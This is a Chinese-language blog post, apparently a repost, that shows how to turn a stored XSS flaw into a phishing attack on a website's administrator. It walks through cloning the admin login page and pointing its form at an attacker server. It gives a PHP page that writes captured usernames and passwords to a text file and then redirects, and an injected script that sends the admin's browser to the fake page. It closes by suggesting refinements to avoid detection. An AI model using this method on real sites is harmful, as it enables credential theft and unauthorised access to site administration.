内容字号:默认大号超大号

段落设置:段首缩进取消段首缩进

字体设置:切换到微软雅黑切换到宋体

XSS钓鱼获取后台账号密码

2018-01-07 20:32 出处:清屏网 人气: 评论(0

前几天在测试某个网站的时候,发现存在存储型跨站脚本漏洞,但是cookie被设置了http-only属性,导致无法获取到cookie的内容,有用的信息只是能够知道后台的地址,如下图所示:

获得的信息并没有Sessionid,也没有授权key,更没有账号和密码,于是把思路转向钓鱼,访问后台,查看源代码。

使用钓鱼的方式获取网站后台账号密码

伪造后台登录界面

查看后台源代码,在本地保存为html文件,并且整理网站链接的路径,将原来的相对路径补充为完整的绝对路径(注意,网站的绝对路径需要是目标网站的域名):

这样,我们就在本地伪造了一个一模一样的后台登录界面。

修改源代码中的POST数据包的提交地址

伪造好后台页面之后,还需要数据包的提交地址。找到源代码中的form表单,修改action选项的值为我们自己服务器的页面地址,这个页面用来接收管理员提交的账号密码。

编写账号密码接收页面

<?php
    $a = $_POST['userName'];
    $b = $_POST['password'];
    $file = fopen("fish.txt","a+");
    fwrite($file,$a);
    fwrite($file,'  ');
    fwrite($file,$b);
    fwrite($file,'  ');
    fclose($file);
    header('Location: http://xxx/main');
?>

该段代码会接收POST参数userName和password(注意,这样个参数的名字需要从后台页面的表单中获得),并且将接收到的内容以追加的方式写入到当前目录中的fish.txt文件中,同时,将页面定位到 http://xxx/main,这样做是为了,在调取管理员的账号密码之后,将管理员重定向到他自己网站的后台(因为管理员之前已经登录过自己的后台,重新定向到原网站的登录页面,会直接进入到后台首页)。

构建XSS语句

构建如下语句:

<script>window.top.location.href="http://xxx/xxx/钓鱼.html";</script>

将语句插入到之前能够打XSS的地方,等待管理员上钩即可。

总结

攻击过程分析,将XSS语句写入,管理员访问后台触发之后,XSS语句会将管理员的浏览器重新定向到我们自己网站的伪造的和他后台页面一样的地址,如果管理员没有发现,并且在我们伪造的页面上做了登录操作,那么我们的页面会将POST的表单提交到我们的服务器的某个页面并且将内容记录到txt文件中,这样就获取到了管理员的账号密码。

缺点,只要管理员不删除我们的攻击语句,只要他在后台访问存在攻击语句的页面,那攻击将会一直触发,也就是会不停的跳转到伪造的钓鱼页面,这样管理员很容易发现,后续需要考虑通过代码的方式实现该攻击仅仅触发一次。

分享给小伙伴们:
本文标签: XSS钓鱼

相关文章

发表评论愿您的每句评论,都能给大家的生活添色彩,带来共鸣,带来思索,带来快乐。

CopyRight © 2015-2016 QingPingShan.com , All Rights Reserved.

清屏网 版权所有 豫ICP备15026204号